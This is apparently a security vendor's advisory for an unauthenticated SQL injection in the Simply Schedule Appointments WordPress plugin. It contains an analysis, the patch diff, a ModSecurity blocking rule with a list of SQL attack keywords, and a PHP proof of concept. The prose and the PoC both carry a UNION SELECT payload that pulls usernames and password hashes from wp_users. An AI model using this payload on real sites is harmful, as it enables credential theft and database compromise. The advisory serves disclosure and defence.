Atomic Edge analysis of CVE-2026-39493:
The Simply Schedule Appointments WordPress plugin contains an unauthenticated SQL injection vulnerability in versions up to and including 1.6.9.27. This vulnerability exists in the plugin’s database query handling and allows attackers to inject arbitrary SQL commands via the `append_where_sql` parameter.
Atomic Edge research identifies the root cause in the `td-db-model.php` file within the `get_where_sql` method. The vulnerable code at lines 1016-1027 accepts user-controlled `append_where_sql` parameter values and directly concatenates them into SQL WHERE clauses without proper sanitization or prepared statements. The plugin fails to validate that the `append_where_sql` parameter originates from trusted backend code rather than user input.
Exploitation occurs through HTTP requests containing the `append_where_sql` parameter with SQL injection payloads. Attackers can target any endpoint that calls the vulnerable `get_where_sql` method. The parameter can be delivered via GET, POST, or JSON request body. A typical payload would append UNION SELECT statements to extract database information, such as `append_where_sql= UNION SELECT user_login,user_pass FROM wp_users`.
The patch adds comprehensive input validation in the `get_where_sql` method. The updated code checks multiple request sources including `$_REQUEST`, `$_FILES`, and raw JSON input via `php://input`. The patch blocks execution of `append_where_sql` values when they originate from any user-controllable source. Before the patch, the code only checked `$_REQUEST[‘append_where_sql’]` but ignored other input vectors. After the patch, the method requires `append_where_sql` to originate exclusively from trusted backend code.
Successful exploitation enables complete database compromise. Attackers can extract sensitive information including WordPress user credentials, appointment data, customer personal information, and plugin configuration. The vulnerability requires no authentication, making all WordPress installations with the vulnerable plugin immediately accessible to remote attackers.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/simply-schedule-appointments/includes/class-appointment-model.php
+++ b/simply-schedule-appointments/includes/class-appointment-model.php
@@ -1361,6 +1361,11 @@
}
$data = $this->query( $params );
+
+ // If complete_group is set, fetch additional appointments to complete any partial groups
+ if ( ! empty( $params['complete_group'] ) ) {
+ $data = $this->complete_group_appointments( $data );
+ }
foreach( $data as $index => $appointment ) {
$data[$index] = $this->format_multiline_customer_information($appointment);
@@ -1974,4 +1979,56 @@
$appointment_object = new SSA_Appointment_Object( $id );
return $appointment_object->get_label_id();
}
+
+ /**
+ * Complete group appointments by fetching any missing appointments from partial groups.
+ *
+ * When appointments are fetched with pagination, group appointments may be split across pages.
+ * This method ensures all appointments belonging to the same group are returned together.
+ *
+ * @since 6.7.0
+ *
+ * @param array $data The initially fetched appointments.
+ * @return array The appointments with any missing group members added.
+ */
+ public function complete_group_appointments( $data ) {
+ if ( empty( $data ) ) {
+ return $data;
+ }
+
+ // Collect all group_ids and track which appointment IDs we already have
+ $group_ids = array();
+ $existing_appt_ids = array();
+
+ foreach ( $data as $appointment ) {
+ if ( ! empty( $appointment['group_id'] ) && $appointment['group_id'] > 0 ) {
+ $group_ids[] = $appointment['group_id'];
+ }
+ $existing_appt_ids[] = $appointment['id'];
+ }
+
+ $group_ids = array_unique( $group_ids );
+
+ // No groups found, return original data
+ if ( empty( $group_ids ) ) {
+ return $data;
+ }
+
+ // Query for appointments in each group that we don't already have
+ foreach ( $group_ids as $group_id ) {
+ $group_appointments = $this->query( array(
+ 'group_id' => $group_id,
+ 'number' => -1,
+ ) );
+
+ foreach ( $group_appointments as $appointment ) {
+ if ( ! in_array( $appointment['id'], $existing_appt_ids, true ) ) {
+ $data[] = $appointment;
+ $existing_appt_ids[] = $appointment['id'];
+ }
+ }
+ }
+
+ return $data;
+ }
}
--- a/simply-schedule-appointments/includes/class-elementor.php
+++ b/simply-schedule-appointments/includes/class-elementor.php
@@ -20,7 +20,7 @@
*
* @var string The plugin version.
*/
- const VERSION = '1.6.9.27';
+ const VERSION = '1.6.9.29';
/**
* Minimum Elementor Version
@@ -29,7 +29,7 @@
*
* @var string Minimum Elementor version required to run the plugin.
*/
- const MINIMUM_ELEMENTOR_VERSION = '1.6.9.27';
+ const MINIMUM_ELEMENTOR_VERSION = '1.6.9.29';
/**
* Minimum PHP Version
@@ -38,7 +38,7 @@
*
* @var string Minimum PHP version required to run the plugin.
*/
- const MINIMUM_PHP_VERSION = '1.6.9.27';
+ const MINIMUM_PHP_VERSION = '1.6.9.29';
/**
* Instance
--- a/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
+++ b/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
@@ -23,7 +23,7 @@
* @package PHP-PayPal-IPN
* @author Micah Carrick
* @copyright (c) 2011 - Micah Carrick
- * @version 1.6.9.27
+ * @version 1.6.9.29
* @license http://opensource.org/licenses/gpl-3.0.html
*/
--- a/simply-schedule-appointments/includes/lib/td-util/class-td-db-model.php
+++ b/simply-schedule-appointments/includes/lib/td-util/class-td-db-model.php
@@ -1016,13 +1016,26 @@
$schema = $this->get_schema();
// we allow append_where_sql to be set in the backend, but not in the request parameters
- if ( ! empty( $args['append_where_sql'] ) && empty( $_REQUEST['append_where_sql']) ) {
- if( ! is_array( $args['append_where_sql'] ) ) {
- $args['append_where_sql'] = array( $args['append_where_sql'] );
- }
-
- foreach ($args['append_where_sql'] as $where_sql) {
- $where .= $where_sql;
+ if ( ! empty( $args['append_where_sql'] ) ) {
+ // confirm not coming from request params or body
+ // also check file_get_contents('php://input');
+ $input_raw = file_get_contents('php://input');
+ $input_json = json_decode($input_raw, true) ?? [];
+ $found_in_payload = (
+ isset($_REQUEST['append_where_sql']) ||
+ isset($_FILES['append_where_sql']) ||
+ isset($input_json['append_where_sql'])
+ );
+
+ // only append the where sql if it's not coming from the request params or body, to prevent potential sql injection
+ if( ! $found_in_payload ) {
+ if( ! is_array( $args['append_where_sql'] ) ) {
+ $args['append_where_sql'] = array( $args['append_where_sql'] );
+ }
+
+ foreach ($args['append_where_sql'] as $where_sql) {
+ $where .= $where_sql;
+ }
}
}
--- a/simply-schedule-appointments/simply-schedule-appointments.php
+++ b/simply-schedule-appointments/simply-schedule-appointments.php
@@ -3,7 +3,7 @@
* Plugin Name: Simply Schedule Appointments
* Plugin URI: https://simplyscheduleappointments.com
* Description: Easy appointment scheduling
- * Version: 1.6.9.27
+ * Version: 1.6.9.29
* Requires PHP: 7.4
* Author: NSquared
* Author URI: https://nsquared.io/
@@ -15,7 +15,7 @@
* @link https://simplyscheduleappointments.com
*
* @package Simply_Schedule_Appointments
- * @version 1.6.9.27
+ * @version 1.6.9.29
*
* Built using generator-plugin-wp (https://github.com/WebDevStudios/generator-plugin-wp)
*/
@@ -206,7 +206,7 @@
* @var string
* @since 0.0.0
*/
- const VERSION = '1.6.9.27';
+ const VERSION = '1.6.9.29';
/**
* URL of plugin directory.
--- a/simply-schedule-appointments/vendor/composer/installed.php
+++ b/simply-schedule-appointments/vendor/composer/installed.php
@@ -3,7 +3,7 @@
'name' => '__root__',
'pretty_version' => 'dev-master',
'version' => 'dev-master',
- 'reference' => '1dcdb3510a8f954244278878a613ea5dcaf6ea72',
+ 'reference' => '03b73d1b9dd38e343b43649f9def24151b7a447b',
'type' => 'library',
'install_path' => __DIR__ . '/../../',
'aliases' => array(),
@@ -13,7 +13,7 @@
'__root__' => array(
'pretty_version' => 'dev-master',
'version' => 'dev-master',
- 'reference' => '1dcdb3510a8f954244278878a613ea5dcaf6ea72',
+ 'reference' => '03b73d1b9dd38e343b43649f9def24151b7a447b',
'type' => 'library',
'install_path' => __DIR__ . '/../../',
'aliases' => array(),
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-39493
SecRule REQUEST_URI "@rx ^/wp-(?:admin/|content/plugins/simply-schedule-appointments/|json/ssa/)"
"id:202639493,phase:2,deny,status:403,chain,msg:'CVE-2026-39493 SQLi via Simply Schedule Appointments append_where_sql',severity:'CRITICAL',tag:'CVE-2026-39493',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION'"
SecRule ARGS:append_where_sql "@detectSQLi"
"t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace"
SecRule REQUEST_BODY "@rx append_where_sql[=:].*?(?:union|select|insert|update|delete|drop|create|alter|exec|sleep|benchmark|waitfor|pg_sleep)"
"id:202639494,phase:2,deny,status:403,chain,msg:'CVE-2026-39493 SQLi in request body via append_where_sql',severity:'CRITICAL',tag:'CVE-2026-39493',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION'"
SecRule REQUEST_URI "@rx ^/wp-(?:admin/|content/plugins/simply-schedule-appointments/|json/ssa/)"
"t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-39493 - Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin <= 1.6.9.27 - Unauthenticated SQL Injection
<?php
$target_url = "http://vulnerable-site.com/wp-admin/admin-ajax.php";
// The exact endpoint may vary - attackers would need to identify endpoints
// that call the vulnerable get_where_sql method with user-controlled parameters
$payload = array(
'action' => 'ssa_endpoint', // This would need to be a valid plugin action
'append_where_sql' => " UNION SELECT user_login,user_pass FROM wp_users--"
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Add headers to mimic legitimate WordPress AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/x-www-form-urlencoded',
'X-Requested-With: XMLHttpRequest'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
echo "Request sent. Check response for database data.n";
echo "Response preview: " . substr($response, 0, 500) . "n";
} else {
echo "Request failed with HTTP code: $http_coden";
}
// Note: The actual exploitation requires identifying specific endpoints
// that pass the append_where_sql parameter to the vulnerable method.
// This PoC demonstrates the attack vector structure.
?>
